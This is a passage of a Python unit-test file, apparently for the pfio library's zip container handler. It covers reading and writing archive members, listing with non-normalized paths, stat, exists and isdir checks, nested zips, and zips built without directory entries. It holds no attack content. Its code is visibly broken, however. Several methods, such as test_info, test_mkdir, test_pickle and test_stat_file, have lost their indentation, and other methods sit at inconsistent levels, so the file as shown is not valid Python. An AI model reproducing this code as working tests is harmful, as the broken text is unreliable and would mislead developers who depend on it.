    self.zipped_file_name = ZIP_TEST_FILENAME_LIST["zipped_file_name"]
    self.testfile_name = ZIP_TEST_FILENAME_LIST["testfile_name"]
    # paths used in making outside.zip
    dir_path1 = os.path.join(self.tmpdir.name, self.dir_name1)
    dir_path2 = os.path.join(self.tmpdir.name, self.dir_name2)
    testfile_path = os.path.join(self.tmpdir.name, self.testfile_name)
    nested_dir_path = os.path.join(self.tmpdir.name, self.nested_dir_name)
    zipped_file_path = os.path.join(dir_path2, self.zipped_file_name)
    nested_zipped_file_path = os.path.join(
        nested_dir_path, self.nested_zipped_file_name)
    nested_zip_file_path = os.path.join(
        dir_path1, self.nested_zip_file_name)
    # paths used in tests (relative, as seen inside the archive)
    self.zip_file_path = self.zip_file_name + ".zip"
    self.zipped_file_path = os.path.join(self.dir_name2,
                                         self.zipped_file_name)
    self.nested_zip_path = os.path.join(
        self.dir_name1, self.nested_zip_file_name)
    self.nested_zipped_file_path = os.path.join(
        self.nested_dir_name, self.nested_zipped_file_name)
    # Materialize the directory tree and its payload files
    os.mkdir(dir_path1)
    os.mkdir(dir_path2)
    os.mkdir(nested_dir_path)
    with open(zipped_file_path, "w") as tmpfile:
        tmpfile.write(self.test_string)
    with open(nested_zipped_file_path, "w") as tmpfile:
        tmpfile.write(self.nested_test_string)
    with open(testfile_path, "w") as tmpfile:
        tmpfile.write(self.test_string)
    # Zip the nested dir first, then remove the loose copy
    make_zip(nested_zip_file_path,
             root_dir=self.tmpdir.name,
             base_dir=self.nested_dir_name)
    shutil.rmtree(nested_dir_path)
    # this will include outside.zip itself into the zip
    make_zip(self.zip_file_path,
             root_dir=self.tmpdir.name,
             base_dir=".")
def tearDown(self):
    """Remove the temp tree and the generated outside zip."""
    self.tmpdir.cleanup()
    pfio.remove(self.zip_file_path)
def test_read_bytes(self):
    """A file inside the zip can be read in binary mode."""
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(self.zipped_file_path, "rb") as zipped_file:
            self.assertEqual(self.test_string_b, zipped_file.read())
def test_read_string(self):
    """A file inside the zip can be read in text mode."""
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(self.zipped_file_path, "r") as zipped_file:
            self.assertEqual(self.test_string, zipped_file.readline())
@pytest.mark.skipif(sys.version_info < (3, 6),
                    reason="requires python3.6 or higher")
def test_write_bytes(self):
    """Bytes written into the zip can be read back after reopening it."""
    testfile_name = "testfile3"
    test_string = "this is a written string\n"
    test_string_b = test_string.encode("utf-8")
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(testfile_name, "wb") as zipped_file:
            zipped_file.write(test_string_b)
    # Reopen the container to verify the write was persisted
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(testfile_name, "rb") as zipped_file:
            self.assertEqual(test_string_b, zipped_file.readline())
@pytest.mark.skipif(sys.version_info < (3, 6),
                    reason="requires python3.6 or higher")
def test_write_string(self):
    """Text written into the zip can be read back after reopening it."""
    testfile_name = "testfile3"
    test_string = "this is a written string\n"
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(testfile_name, "w") as zipped_file:
            zipped_file.write(test_string)
    # Reopen the container to verify the write was persisted
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(testfile_name, "r") as zipped_file:
            self.assertEqual(test_string, zipped_file.readline())
def test_open_non_exist(self):
    """Opening a missing file inside a missing container raises IOError."""
    non_exist_file = "non_exist_file.txt"
    with self.fs_handler.open_as_container(non_exist_file) as handler:
        self.assertRaises(IOError, handler.open, non_exist_file)
@parameterized.expand([
    # not normalized path
    ['././{}//../{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                               ZIP_TEST_FILENAME_LIST["dir_name2"],
                               ZIP_TEST_FILENAME_LIST["zipped_file_name"])]
])
def test_open_non_normalized_path(self, path_or_prefix):
    """Paths containing './', '//' and '..' segments resolve inside the zip."""
    with self.fs_handler.open_as_container(
            os.path.abspath(self.zip_file_path)) as handler:
        with handler.open(path_or_prefix, "r") as zipped_file:
            self.assertEqual(self.test_string, zipped_file.read())
    @parameterized.expand([
        # default case get the first level from the root
        ["",
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         False],
        # Problem 1 in issue #66
        [ZIP_TEST_FILENAME_LIST["dir_name2"],
         [ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
         False],
        # problem 2 in issue #66
        [ZIP_TEST_FILENAME_LIST["dir_name2"],
         [ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
         False],
        # not normalized path
        ['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                              ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         [ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
         False],
        # not normalized path root
        ['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         False],
        # not normalized path beyond root
        ['//..//',
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         False],
        # not normalized path beyond root
        ['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         False],
        # starting with slash
        ['/',
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         False],
        # recursive test
        ['',
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
                       ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
                       ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         True],
        [ZIP_TEST_FILENAME_LIST["dir_name2"],
         [ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
         True],
        # problem 2 in issue #66
        [ZIP_TEST_FILENAME_LIST["dir_name2"],
         [ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
         True],
        # not normalized path
        ['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                              ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         [ZIP_TEST_FILENAME_LIST["zipped_file_name"]],
         True],
        # not normalized path root
        ['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
                       ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
                       ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         True],
        # not normalized path beyond root
        ['//..//',
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
                       ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
                       ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         True],
        # starting with slash
        ['/',
         [ZIP_TEST_FILENAME_LIST["dir_name1"],
          ZIP_TEST_FILENAME_LIST["dir_name2"],
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name1"],
                       ZIP_TEST_FILENAME_LIST["nested_zip_file_name"]),
          os.path.join(ZIP_TEST_FILENAME_LIST["dir_name2"],
                       ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
          ZIP_TEST_FILENAME_LIST["testfile_name"]],
         True]]
    )
    def test_list(self, path_or_prefix, expected_list, recursive):
        """List archive members under a (possibly non-normalized) prefix.

        Each case supplies a prefix, the expected member names, and
        whether the listing should recurse into subdirectories.
        Ordering of the listing is unspecified, so compare sorted.
        """
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            zip_generator = handler.list(path_or_prefix,
                                         recursive=recursive)
            zip_list = list(zip_generator)
            self.assertEqual(sorted(expected_list),
                             sorted(zip_list))
    @parameterized.expand([
        # non_exist_file
        ['does_not_exist', FileNotFoundError],
        # not exist but share the prefix
        ['{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"][:1]),
         FileNotFoundError],
        # broken path
        ['{}//{}/'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                          ZIP_TEST_FILENAME_LIST["zipped_file_name"][:1]),
         FileNotFoundError],
        # list a file
        ['{}//{}///'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                            ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         NotADirectoryError]
    ])
    def test_list_with_errors(self, path_or_prefix, error):
        """Listing an invalid path raises the same error both
        non-recursively and recursively."""
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            with self.assertRaises(error):
                list(handler.list(path_or_prefix))
            with self.assertRaises(error):
                list(handler.list(path_or_prefix, recursive=True))
def test_info(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertIsInstance(handler.info(), str)
    @parameterized.expand([
        # path ends with slash
        ['{}//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         True],
        # not normalized path
        ['{}//{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                         ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         False],
        ['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
                                ZIP_TEST_FILENAME_LIST["dir_name2"],
                                ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         False],
        # problem 2 in issue #66
        [ZIP_TEST_FILENAME_LIST["dir_name2"],
         True],
        # not normalized path
        ['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                              ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         True],
        # not normalized path root
        ['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         False],
        # not normalized path beyond root
        ['//..//',
         False],
        # starting with slash
        ['/',
         False]]
    )
    def test_isdir(self, path_or_prefix, expected):
        """``isdir`` follows '..'/'//' segments; root and beyond-root
        resolve to non-directories (False)."""
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            self.assertEqual(handler.isdir(path_or_prefix),
                             expected)
@parameterized.expand(NON_EXIST_LIST)
def test_isdir_non_exist(self, path_or_prefix):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertFalse(handler.isdir(path_or_prefix))
def test_mkdir(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertRaises(io.UnsupportedOperation, handler.mkdir, "test")
def test_makedirs(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertRaises(io.UnsupportedOperation,
handler.makedirs, "test/test")
def test_pickle(self):
pickle_file_name = "test_pickle.pickle"
test_data = {'test_elem1': b'balabala',
'test_elem2': 'balabala'}
pickle_zip = "test_pickle.zip"
with open(pickle_file_name, "wb") as f:
pickle.dump(test_data, f)
with ZipFile(pickle_zip, "w") as test_zip:
test_zip.write(pickle_file_name)
with self.fs_handler.open_as_container(pickle_zip) as handler:
with handler.open(pickle_file_name, 'rb') as f:
loaded_obj = pickle.load(f)
self.assertEqual(test_data, loaded_obj)
os.remove(pickle_file_name)
os.remove(pickle_zip)
    @parameterized.expand([
        # path ends with slash
        ['{}//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         True],
        # not normalized path
        ['{}//{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                         ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         True],
        ['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
                                ZIP_TEST_FILENAME_LIST["dir_name2"],
                                ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         True],
        ['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
                                ZIP_TEST_FILENAME_LIST["dir_name2"],
                                ZIP_TEST_FILENAME_LIST["zipped_file_name"][:-1]
                                ),
         False],
        # # not normalized path
        ['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                              ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         True],
        # not normalized path root
        ['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         False],
        # not normalized path beyond root
        ['//..//',
         False],
        # starting with slash
        ['/',
         False]]
    )
    def test_exists(self, path_or_prefix, expected):
        """``exists`` resolves non-normalized paths; the root itself and
        anything above it report False."""
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            self.assertEqual(handler.exists(path_or_prefix),
                             expected)
@parameterized.expand(NON_EXIST_LIST)
def test_not_exists(self, non_exist_file):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertFalse(handler.exists(non_exist_file))
def test_remove(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertRaises(io.UnsupportedOperation,
handler.remove, "test/test", False)
    def test_nested_zip(self):
        """A zip stored inside a zip can itself be opened as a container."""
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            with handler.open_as_container(
                    self.nested_zip_path) as nested_zip:
                # Default open mode yields bytes ...
                with nested_zip.open(self.nested_zipped_file_path) as f:
                    self.assertEqual(f.read(), self.nested_test_string_b)
                # ... while "r" decodes to text.
                with nested_zip.open(self.nested_zipped_file_path, "r") as f:
                    self.assertEqual(f.read(), self.nested_test_string)
    @parameterized.expand([
        # path ends with slash
        ['{}//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
         '{}/'.format(ZIP_TEST_FILENAME_LIST["dir_name2"])],
        # not normalized path
        ['{}//{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                         ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         '{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                        ZIP_TEST_FILENAME_LIST["zipped_file_name"])],
        ['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
                                ZIP_TEST_FILENAME_LIST["dir_name2"],
                                ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         '{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                        ZIP_TEST_FILENAME_LIST["zipped_file_name"])],
        ['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
                              ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
         '{}/'.format(ZIP_TEST_FILENAME_LIST["dir_name2"])]
    ])
    def test_stat(self, path_or_prefix, expected):
        """``stat`` normalizes the queried path and reports the canonical
        member filename (directories keep their trailing slash)."""
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            self.assertEqual(expected, handler.stat(path_or_prefix).filename)
    @parameterized.expand([
        # not normalized path root
        '{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
        # not normalized path beyond root
        '//..//',
        # root
        '/'] + NON_EXIST_LIST)
    def test_stat_non_exist(self, path_or_prefix):
        """``stat`` raises FileNotFoundError for the archive root, paths
        above it, and missing members alike."""
        with self.fs_handler.open_as_container(self.zip_file_path) as handler:
            with self.assertRaises(FileNotFoundError):
                handler.stat(path_or_prefix)
def test_stat_file(self):
test_file_name = 'testdir2/testfile1'
expected = ZipFile(self.zip_file_path).getinfo(test_file_name)
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
stat = handler.stat(test_file_name)
self.assertIsInstance(stat, pfio.containers.zip.ZipFileStat)
self.assertTrue(stat.filename.endswith(test_file_name))
self.assertEqual(stat.size, expected.file_size)
self.assertEqual(stat.mode, expected.external_attr >> 16)
self.assertFalse(stat.isdir())
expected_mtime = datetime(*expected.date_time).timestamp()
self.assertIsInstance(stat.last_modified, float)
self.assertEqual(stat.last_modified, expected_mtime)
for k in ('filename', 'orig_filename', 'comment', 'create_system',
'create_version', 'extract_version', 'flag_bits',
'volume', 'internal_attr', 'external_attr', 'CRC',
'header_offset', 'compress_size', 'compress_type'):
self.assertEqual(getattr(stat, k), getattr(expected, k))
def test_stat_directory(self):
test_dir_name = 'testdir2/'
expected = ZipFile(self.zip_file_path).getinfo(test_dir_name)
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
stat = handler.stat(test_dir_name)
self.assertIsInstance(stat, pfio.containers.zip.ZipFileStat)
self.assertTrue(stat.filename.endswith(test_dir_name))
self.assertEqual(stat.size, expected.file_size)
self.assertEqual(stat.mode, expected.external_attr >> 16)
self.assertTrue(stat.isdir())
expected_mtime = datetime(*expected.date_time).timestamp()
self.assertIsInstance(stat.last_modified, float)
self.assertEqual(stat.last_modified, expected_mtime)
for k in ('filename', 'orig_filename', 'comment', 'create_system',
'create_version', 'extract_version', 'flag_bits',
'volume', 'internal_attr', 'external_attr', 'CRC',
'header_offset', 'compress_size', 'compress_type'):
self.assertEqual(getattr(stat, k), getattr(expected, k))
    @pytest.mark.skipif(sys.version_info < (3, 6),
                        reason="requires python3.6 or higher")
    def test_writing_after_listing(self):
        """The handler reopens the underlying ZipFile in write mode when a
        write follows a read-mode operation."""
        testfile_name = "testfile3"
        test_string = "this is a written string\n"
        with self.fs_handler.open_as_container(
                os.path.abspath(self.zip_file_path)) as handler:
            # Listing forces the archive open in read mode first.
            list(handler.list())
            self.assertEqual(handler.zip_file_obj_mode, "r")
            with handler.open(testfile_name, "w") as zipped_file:
                zipped_file.write(test_string)
            self.assertEqual(handler.zip_file_obj_mode, "w")
    @pytest.mark.skipif(sys.version_info > (3, 5),
                        reason="requires python3.5 or lower")
    def test_mode_w_exception(self):
        """On Python <= 3.5 (no zipfile write-stream support), opening a
        member for write raises ValueError."""
        testfile_name = "testfile3"
        test_string = "this is a written string\n"
        with self.fs_handler.open_as_container(
                os.path.abspath(self.zip_file_path)) as handler:
            with self.assertRaises(ValueError):
                with handler.open(testfile_name, "w") as zipped_file:
                    zipped_file.write(test_string)
class TestZipHandlerWithLargeData(unittest.TestCase):
    """Exercise the zip handler with a ~1 MiB member, including
    concurrent reads through a single shared container handle."""

    def setUp(self):
        # The following zip layout is created for all the tests
        # outside.zip
        # | - testfile1
        n = 1 << 20  # 1 MiB of random text
        self.test_string = make_random_str(n)
        self.fs_handler = pfio.create_handler("posix")
        # the most outside zip
        self.zip_file_name = "outside"
        # nested zip and nested file
        self.tmpdir = tempfile.TemporaryDirectory()
        # test file
        self.testfile_name = "testfile1"
        # paths used in making outside.zip
        testfile_path = os.path.join(self.tmpdir.name, self.testfile_name)
        # paths used in tests
        self.zip_file_path = self.zip_file_name + ".zip"
        with open(testfile_path, "w") as tmpfile:
            tmpfile.write(self.test_string)
        # this will include outside.zip itself into the zip
        make_zip(self.zip_file_path,
                 root_dir=self.tmpdir.name,
                 base_dir=".")

    def tearDown(self):
        self.tmpdir.cleanup()
        pfio.remove(self.zip_file_path)

    def test_read_multi_processes(self):
        """Two child processes read the same member through the parent's
        already-opened container; the barrier makes the reads overlap."""
        barrier = multiprocessing.Barrier(2)
        with self.fs_handler.open_as_container(
                os.path.abspath(self.zip_file_path)) as handler:
            with handler.open(self.testfile_name) as f:
                f.read()

            def func():
                # accessing the shared container
                with handler.open(self.testfile_name) as f:
                    barrier.wait()
                    f.read()
            p1 = multiprocessing.Process(target=func)
            p2 = multiprocessing.Process(target=func)
            p1.start()
            p2.start()
            # NOTE(review): a 1s join timeout leaves exitcode None (and a
            # confusing assertion failure) on a slow machine — confirm.
            p1.join(timeout=1)
            p2.join(timeout=1)
            self.assertEqual(p1.exitcode, 0)
            self.assertEqual(p2.exitcode, 0)
# File and directory names shared between TestZipHandlerListNoDirectory's
# fixture zip and its parameterized test expectations.
NO_DIRECTORY_FILENAME_LIST = {
    "dir1_name": "testdir1",
    "dir2_name": "testdir2",
    "dir3_name": "testdir3",
    "testfile1_name": "testfile1",
    "testfile2_name": "testfile2",
    "testfile3_name": "testfile3",
    "testfile4_name": "testfile4",
}
class TestZipHandlerListNoDirectory(unittest.TestCase):
    """Listing behavior for zips created WITHOUT explicit directory
    entries (``zip -D``), where directories only exist implicitly as
    prefixes of member names."""

    def setUp(self):
        # The following zip layout is created for all the tests
        # The difference is despite showing in the following layout for
        # readabilty, the directories are not included in the zip
        # outside.zip
        # | - testdir1
        # | - | - testfile1
        # | - | - testdir2
        # | - | - | - testfile2
        # | - testdir3
        # |   | - testfile3
        # | - testfile4
        self.test_string = "this is a test string\n"
        self.fs_handler = pfio.create_handler("posix")
        # the most outside zip
        self.zip_file_name = "outside.zip"
        # nested zip and nested file
        self.tmpdir = tempfile.TemporaryDirectory()
        # directory and file
        self.dir1_name = NO_DIRECTORY_FILENAME_LIST["dir1_name"]
        self.dir2_name = NO_DIRECTORY_FILENAME_LIST["dir2_name"]
        self.dir3_name = NO_DIRECTORY_FILENAME_LIST["dir3_name"]
        self.testfile1_name = NO_DIRECTORY_FILENAME_LIST["testfile1_name"]
        self.testfile2_name = NO_DIRECTORY_FILENAME_LIST["testfile2_name"]
        self.testfile3_name = NO_DIRECTORY_FILENAME_LIST["testfile3_name"]
        self.testfile4_name = NO_DIRECTORY_FILENAME_LIST["testfile4_name"]
        # paths used in making outside.zip
        dir1_path = os.path.join(self.tmpdir.name, self.dir1_name)
        dir2_path = os.path.join(dir1_path, self.dir2_name)
        dir3_path = os.path.join(self.tmpdir.name, self.dir3_name)
        testfile1_path = os.path.join(dir1_path, self.testfile1_name)
        testfile2_path = os.path.join(dir2_path, self.testfile2_name)
        testfile3_path = os.path.join(dir3_path, self.testfile3_name)
        testfile4_path = os.path.join(self.tmpdir.name, self.testfile4_name)
        # paths used in tests
        for dir in [dir1_path, dir2_path, dir3_path]:
            os.mkdir(dir)
        for file_path in [testfile1_path, testfile2_path,
                          testfile3_path, testfile4_path]:
            with open(file_path, "w") as f:
                f.write(self.test_string)
        # create zip without directory
        # (the external ``zip -D`` tool is used because Python's zipfile
        # always records directory entries created via write())
        self.pwd = os.getcwd()
        os.chdir(self.tmpdir.name)
        cmd = ["zip", "-rD", self.zip_file_name, "."]
        process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        assert stderr == b""

    def tearDown(self):
        os.chdir(self.pwd)
        self.tmpdir.cleanup()

    @parameterized.expand([
        # default case get the first level from the root
        ["", [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
              NO_DIRECTORY_FILENAME_LIST["dir3_name"],
              NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         False],
        # Problem 1 in issue #66
        [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
         [NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
          NO_DIRECTORY_FILENAME_LIST["dir2_name"]],
         False],
        # problem 2 in issue #66
        [os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                      NO_DIRECTORY_FILENAME_LIST["dir2_name"]),
         [NO_DIRECTORY_FILENAME_LIST["testfile2_name"]],
         False],
        # not normalized path
        ['{}//{}//../'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                              NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
         [NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
          NO_DIRECTORY_FILENAME_LIST["dir2_name"]],
         False],
        # not normalized path root
        ['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]),
         [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
          NO_DIRECTORY_FILENAME_LIST["dir3_name"],
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         False],
        # not normalized path beyond root
        ['//..//',
         [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
          NO_DIRECTORY_FILENAME_LIST["dir3_name"],
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         False],
        # not normalized path beyond root
        ['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]),
         [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
          NO_DIRECTORY_FILENAME_LIST["dir3_name"],
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         False],
        # starting with slash
        ['/', [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
               NO_DIRECTORY_FILENAME_LIST["dir3_name"],
               NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         False],
        # recursive test
        ['',
         [os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         True],
        [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
         [NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"])],
         True],
        # problem 2 in issue #66
        [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
         [NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"])],
         True],
        # not normalized path
        ['{}//{}//../'.format(
            NO_DIRECTORY_FILENAME_LIST["dir1_name"],
            NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
         [NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"])],
         True],
        # not normalized path root
        ['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir2_name"]),
         [os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         True],
        # not normalized path beyond root
        ['//..//',
         [os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         True],
        # not normalized path beyond root
        ['{}//..//../'.format(NO_DIRECTORY_FILENAME_LIST["dir2_name"]),
         [os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         True],
        # starting with slash
        ['/',
         [os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                       NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
          os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
                       NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
          NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
         True]
    ])
    def test_list(self, path_or_prefix, expected_list, recursive):
        """Implicit (prefix-only) directories must still be listable.

        Ordering of the listing is unspecified, so compare sorted.
        """
        with self.fs_handler.open_as_container(self.zip_file_name) as handler:
            zip_generator = handler.list(path_or_prefix,
                                         recursive=recursive)
            zip_list = list(zip_generator)
            self.assertEqual(sorted(expected_list),
                             sorted(zip_list))

    @parameterized.expand([
        # non_exist_file
        ['does_not_exist', FileNotFoundError],
        # not exist but share the prefix
        ['t', FileNotFoundError],
        # broken path
        ['{}//t/'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]),
         FileNotFoundError],
        # list a file
